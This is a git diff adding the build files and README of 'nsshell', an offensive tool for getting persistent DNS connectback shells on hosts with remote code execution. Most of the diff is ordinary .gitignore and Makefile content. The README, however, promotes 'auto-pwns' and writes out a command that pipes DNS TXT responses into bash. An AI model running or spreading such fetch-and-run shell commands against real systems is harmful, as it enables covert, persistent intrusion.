TheRook
diff --git a/‎.gitignore
Lines changed: 50 additions & 0 deletions b/‎.gitignore
Lines changed: 50 additions & 0 deletions
diff --git a/‎LICENSE
Lines changed: 674 additions & 0 deletions b/‎LICENSE
Lines changed: 674 additions & 0 deletions
diff --git a/‎Makefile
Lines changed: 92 additions & 0 deletions b/‎Makefile
Lines changed: 92 additions & 0 deletions
diff --git a/‎README.md
Lines changed: 23 additions & 0 deletions b/‎README.md
Lines changed: 23 additions & 0 deletions
diff --git a/‎icon.png
98.8 KB b/‎icon.png
98.8 KB
diff --git a/‎nsshell.py
Lines changed: 1 addition & 0 deletions b/‎nsshell.py
Lines changed: 1 addition & 0 deletions
@@ -0,0 +1,50 @@
+# nsshell #
+###################
+payloads.txt
+
+
+# Compiled source #
+###################
+*.com
+*.class
+*.dll
+*.exe
+*.o
+*.so
+*.pyc
+*.back
+*.bak
+.idea
+# Packages #
+############
+# it's better to unpack these files and commit the raw source
+# git has its own built in compression methods
+*.7z
+*.dmg
+*.gz
+*.iso
+*.jar
+*.rar
+*.tar
+*.zip
+*.deb
+
+# Logs and databases #
+######################
+*.log
+*.sql
+*.sqlite
+
+# OS generated files #
+######################
+*.DS_Store
+*.DS_Store?
+._*
+*.Spotlight-V100
+*.Trashes
+ehthumbs.db
+Thumbs.db
+*.swp
+
+# bundle packages
+dotfiles/.vim/bundle/*/*
@@ -0,0 +1,92 @@
+#!/usr/bin/make
+# WARN: gmake syntax
+########################################################
+#
+# useful targets:
+#   make test   - run the unit tests
+#   make flake8 - linting and pep8
+#   make docs 	- create manpages and html documentation
+
+########################################################
+# variable section
+
+NAME = nsshell
+OS = $(shell uname -s)
+ARCHITECTURE = amd64
+VERSION= $(shell grep -e 'version=' setup.py | cut -d\' -f 2)
+PYTHON = $(shell which python2)
+VIRTUALENV_PATH = $(shell echo $$HOME/.virtualenvs)
+INSTALL_PATH = /usr/local/lib
+EXEC_PATH = /usr/local/bin
+
+MANPAGES=$(wildcard docs/man/**/*.*.ronn)
+MANPAGES_GEN=$(patsubst %.ronn,%,$(MANPAGES))
+MANPAGES_HTML=$(patsubst %.ronn,%.html,$(MANPAGES))
+ifneq ($(shell which ronn 2>/dev/null),)
+RONN2MAN = ronn
+else
+RONN2MAN = @echo "WARN: 'ronn' command is not installed but is required to build $(MANPAGES)"
+endif
+
+UNITTESTS=unittest
+COVERAGE=coverage
+
+########################################################
+
+
+docs: $(MANPAGES)
+	$(RONN2MAN) $^
+
+.PHONY: clean
+clean:
+	rm -f $(MANPAGES_GEN) $(MANPAGES_HTML)
+	rm -rf ./build
+	rm -rf ./dist
+	rm -rf ./*.egg-info
+	rm -rf ./*.deb
+	rm -rf .tox 
+	rm -rf .coverage 
+	rm -rf .cache
+	find . -name '*.pyc.*' -delete
+	find . -name '*.pyc' -delete
+	find . -name '__pycache__' -delete
+
+test:
+	# "TODO - test"
+
+virtualenv:
+	mkdir -p $(VIRTUALENV_PATH)
+	rm -rf $(VIRTUALENV_PATH)/$(NAME)
+	virtualenv -p $(PYTHON) $(VIRTUALENV_PATH)/$(NAME)
+
+virtualenv-install: virtualenv
+	$(VIRTUALENV_PATH)/$(NAME)/bin/python setup.py install
+
+virtualenv-develop: virtualenv
+	$(VIRTUALENV_PATH)/$(NAME)/bin/python setup.py develop
+
+virtualenv-sdist: virtualenv
+	$(VIRTUALENV_PATH)/$(NAME)/bin/python setup.py sdist
+
+dist: install
+	fpm -s dir -t deb -v $(VERSION) -n $(NAME) -a $(ARCHITECTURE) $(INSTALL_PATH)/$(NAME) $(EXEC_PATH)/$(NAME)
+
+install:
+	virtualenv -p $(PYTHON) $(INSTALL_PATH)/$(NAME)
+	$(INSTALL_PATH)/$(NAME)/bin/python setup.py install
+	ln -f -s $(INSTALL_PATH)/$(NAME)/bin/$(NAME) $(EXEC_PATH)/$(NAME)
+	# look at my templating language ma
+	mkdir -p /etc/nsshell
+	mkdir -p /var/log/nsshell
+	echo -n '[a]\nSCRIPTS_DIR="/etc/nsshell/scripts/"\nLOG_DIR="/var/log/nsshell"' > /etc/nsshell/nsshell.conf
+	cp -r scripts/ /etc/nsshell/
+
+uninstall:
+	rm -rf -v -I $(INSTALL_PATH)/$(NAME)
+	rm -f -v -I $(EXEC_PATH)/$(NAME)
+
+container:
+	bash ./scripts/build.sh -d
+	bash ./scripts/build.sh -b
+
+all: docs test
@@ -0,0 +1,23 @@
+Think sqlmap meets xsshunter - but looking for (blind/nonblind) RCE to get a DNS connectback shell. 
+
+> persistent shell (even if you exit nsshell.py)
+> doesn't touch disk
+> resumes access when you restart nsshell.py
+> nothing to install or compile for the target
+> the target can use their own trusted DNS resolver - or automatically upgrade to a direct connection for speed
+
+Start:
+The tool needs to know which domain it has control over:
+sudo ./nsshell.py hack.com 123.123.123.112
+...
+>wrote connect-back payloads to:payloads.txt"
+
+The file above contains a list of auto-pwns. Run one of the payloads and a persistent shell will be loaded over DNS.
+
+That's all folks!
+
+## install
+sudo make install && echo $(which nsshell) && nsshell localhost 127.0.0.1
+
+spawn a connectback:
+nslookup -type=txt 1 localhost | bash
@@ -0,0 +1 @@
+nsshell/__init__.py